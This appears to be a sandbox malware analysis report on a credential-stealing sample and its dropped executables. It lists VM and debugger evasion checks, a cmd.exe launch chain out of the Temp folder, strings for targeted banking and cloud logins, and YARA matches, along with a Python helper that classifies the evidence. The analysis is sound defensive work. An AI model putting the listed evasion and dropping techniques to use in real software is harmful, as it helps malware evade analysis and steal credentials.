Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (full)
Source: KKFHJJDH.0.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 2Windows 8 Server Datacenter without Hyper-V (core)
Source: KKFHJJDH.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Enterprise without Hyper-V (core)
Source: Amcache.hve.7.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Datacenter without Hyper-V (full)
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: :Windows 2012 R2 Essential Server Solutions without Hyper-V
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 11 Essential Server Solutions without Hyper-V
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Standard without Hyper-V (core)
Source: Amcache.hve.7.dr Binary or memory string: vmci.syshbin
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Standard without Hyper-V (core)
Source: Amcache.hve.7.dr Binary or memory string: VMware, Inc.
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 10 Essential Server Solutions without Hyper-V
Source: Amcache.hve.7.dr Binary or memory string: VMware20,1hbin@
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (core)
Source: 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: xVBoxService.exe
Source: Amcache.hve.7.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Datacenter without Hyper-V (core)
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 10 Server Enterprise without Hyper-V (full)
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Enterprise without Hyper-V (full)
Source: Amcache.hve.7.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Enterprise without Hyper-V (core)
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: *Windows 11 Server Standard without Hyper-V
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Essential Server Solutions without Hyper-V
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: ,Windows 2016 Server Standard without Hyper-V
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Standard without Hyper-V (core)
Source: explorti.exe, 0000000B.00000002.2552429167.0000000001594000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWt]
Source: KKFHJJDH.0.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: Amcache.hve.7.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Datacenter without Hyper-V (core)
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Datacenter without Hyper-V (full)
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Datacenter without Hyper-V (core)
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Enterprise without Hyper-V (full)
Source: 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: VBoxService.exe
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Standard without Hyper-V
Source: KKFHJJDH.0.dr Binary or memory string: dev.azure.comVMware20,11696492231j
Source: KKFHJJDH.0.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: Amcache.hve.7.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: *Windows 10 Server Standard without Hyper-V
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 1Windows 11 Server Standard without Hyper-V (core)
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 1Windows 10 Server Standard without Hyper-V (core)
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Enterprise without Hyper-V (full)
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Datacenter without Hyper-V (full)
Source: 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: VMWare
Source: Amcache.hve.7.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (core)
Source: 25bb638aac.exe, 0000000D.00000002.1636866589.0000000001CA9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWJ
Source: KKFHJJDH.0.dr Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: Zachv5lCuu.exe, Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Enterprise without Hyper-V (full)
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 2Windows 8.1 Server Standard without Hyper-V (core)
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 2Windows 8 Server Datacenter without Hyper-V (full)
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (core)
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 2Windows 8 Server Enterprise without Hyper-V (full)
Source: Zachv5lCuu.exe, 00000000.00000002.1502723173.0000000000F0C000.00000040.00000001.01000000.00000003.sdmp, 25bb638aac.exe, 0000000D.00000002.1635944793.000000000107C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: #Windows 11 Microsoft Hyper-V Server
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\Zachv5lCuu.exe Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Code function: 9_2_0508000F Start: 0508017E End: 0508002B 9_2_0508000F
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: SIWVID
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Code function: 9_2_05080C45 rdtsc 9_2_05080C45
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CD05FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose, 0_2_6CD05FF0
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCA3480 ?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ,GetCurrentProcess,GetProcessTimes,LoadLibraryW,GetProcAddress,__Init_thread_footer,__aulldiv,FreeLibrary,GetSystemTimeAsFileTime, 0_2_6CCA3480
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 11_2_00C2643B mov eax, dword ptr fs:[00000030h] 11_2_00C2643B
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 11_2_00C2A1A2 mov eax, dword ptr fs:[00000030h] 11_2_00C2A1A2
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCDB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_6CCDB66C
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCDB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6CCDB1F7
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe"
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\HIDAAKEGDB.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe "C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe"
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user~1\AppData\Local\Temp\ad40971b6b\explorti.exe"
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe "C:\Users\user~1\AppData\Local\Temp\1000006001\25bb638aac.exe"
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCDB341 cpuid 0_2_6CCDB341
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\Windows\Fonts\segoeuisl.ttf VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Code function: 0_2_6CCA35A0 ?Startup@TimeStamp@mozilla@@SAXXZ,InitializeCriticalSectionAndSpinCount,getenv,QueryPerformanceFrequency,_strnicmp,GetSystemTimeAdjustment,__aulldiv,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,__aulldiv,strcmp,strcmp,_strnicmp, 0_2_6CCA35A0
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 11_2_00BF6590 LookupAccountNameA, 11_2_00BF6590
Source: Amcache.hve.7.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.7.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.7.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.7.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.7.dr Binary or memory string: MsMpEng.exe
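The anti-debugging evidence above is a flat list of per-process sandbox actions. The following Python script is an added example for this report (it is not the sandbox's own tooling): it parses lines in that format, labels each with the technique the action corresponds to (HideFromDebugger is ThreadHideFromDebugger set through NtSetInformationThread; DebugPort is ProcessDebugPort queried through NtQueryInformationProcess; the window class names are a scan for debuggers and Sysinternals monitors; NTICE/SICE/SIWVID are the SoftICE driver device names; rdtsc and fs:[30h] are timing and PEB checks), and rebuilds the process chain from the "Process created" lines. The sample lines are copied from this report with the page's "Jump to behavior" link text left in, since the raw export carries it on many lines; the technique labels and the SAMPLE_LINES constant are this example's own.

```python
"""Triage helper for Joe Sandbox-style behaviour lines: group the anti-debug /
anti-analysis evidence per process and rebuild the process-creation chain.
Added example for this report; not the sandbox's own code."""
import re
from collections import defaultdict
from pathlib import PureWindowsPath

# Constructed sample: a subset of the evidence lines from this report, with the
# page's "Jump to behavior" link text left in so the parser has to cope with it.
SAMPLE_LINES = r"""
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Code function: 9_2_05080C45 rdtsc 9_2_05080C45
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 11_2_00C2643B mov eax, dword ptr fs:[00000030h] 11_2_00C2643B
Source: C:\Users\user\Desktop\Zachv5lCuu.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe "C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user~1\AppData\Local\Temp\ad40971b6b\explorti.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000006001\25bb638aac.exe "C:\Users\user~1\AppData\Local\Temp\1000006001\25bb638aac.exe" Jump to behavior
""".strip().splitlines()

# "Source: <image path> <action words>: <detail>"; the path carries no spaces.
LINE_RE = re.compile(r"^Source: (?P<src>\S+) (?P<action>[A-Za-z ]+?): (?P<detail>.*)$")
SOFTICE_DEVICES = {"NTICE", "SICE", "SIWVID"}   # SoftICE driver device names


def _parse(line):
    """Strip the page's link text and split the line into its three parts."""
    return LINE_RE.match(line.replace(" Jump to behavior", "").strip())


def classify(line):
    """Map one evidence line to (process basename, technique label) or None.
    The labels are this example's own; the API names are the ones these
    sandbox actions correspond to."""
    m = _parse(line)
    if not m:
        return None
    proc = PureWindowsPath(m["src"]).name
    action, detail = m["action"], m["detail"]
    if action == "Thread information set" and detail == "HideFromDebugger":
        return proc, "ThreadHideFromDebugger via NtSetInformationThread"
    if action == "Process queried" and detail == "DebugPort":
        return proc, "ProcessDebugPort via NtQueryInformationProcess"
    if action == "Open window title or class name":
        return proc, "analysis-tool window scan"
    if action == "File opened" and detail in SOFTICE_DEVICES:
        return proc, "SoftICE driver device probe"
    if action == "Code function":
        if " rdtsc " in detail:
            return proc, "RDTSC timing check"
        if "fs:[00000030h]" in detail:
            return proc, "PEB read through FS:[0x30]"
    return None


def summarize(lines):
    """Return {process: sorted technique labels}; lines that are not
    anti-analysis evidence (memory strings, volume queries, ...) are ignored."""
    found = defaultdict(set)
    for line in lines:
        hit = classify(line)
        if hit:
            found[hit[0]].add(hit[1])
    return {proc: sorted(techs) for proc, techs in found.items()}


def process_chain(lines):
    """De-duplicated (parent, child) edges from 'Process created' lines, in order."""
    edges = []
    for line in lines:
        m = _parse(line)
        if m and m["action"] == "Process created":
            parent = PureWindowsPath(m["src"]).name
            child = PureWindowsPath(m["detail"].split()[0]).name
            if (parent, child) not in edges:
                edges.append((parent, child))
    return edges


if __name__ == "__main__":
    for proc, techniques in summarize(SAMPLE_LINES).items():
        print(proc)
        for technique in techniques:
            print("   ", technique)
    chain = process_chain(SAMPLE_LINES)
    # This report's chain is linear, so the edges can be printed as one path.
    print(" -> ".join([chain[0][0]] + [child for _, child in chain]))
```

Run stand-alone it prints explorti.exe as the process carrying most of the checks and the chain Zachv5lCuu.exe -> cmd.exe -> GHCGDAFCFH.exe -> explorti.exe -> 25bb638aac.exe, which is the drop order recorded above. The action names are matched exactly, so a new signature line simply falls through to None rather than being mislabelled.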

Stealing of Sensitive Information

Source: Yara match File source: 12.2.explorti.exe.bf0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.explorti.exe.bf0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.explorti.exe.bf0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.GHCGDAFCFH.exe.670000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000002.2549928644.0000000000BF1000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.1604254276.0000000000BF1000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.1514567281.0000000004E70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1562659650.00000000053F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1555525227.0000000000671000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1563761009.00000000053F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.2244379812.0000000000BF1000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.2203667415.00000000048D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.25bb638aac.exe.e40000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1502723173.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.1635944793.0000000000E41000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1506072996.0000000001FC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.1636866589.0000000001C3E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Zachv5lCuu.exe PID: 7516, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 25bb638aac.exe PID: 2184, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 0.2.Zachv5lCuu.exe.cd0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.25bb638aac.exe.e40000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1502723173.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
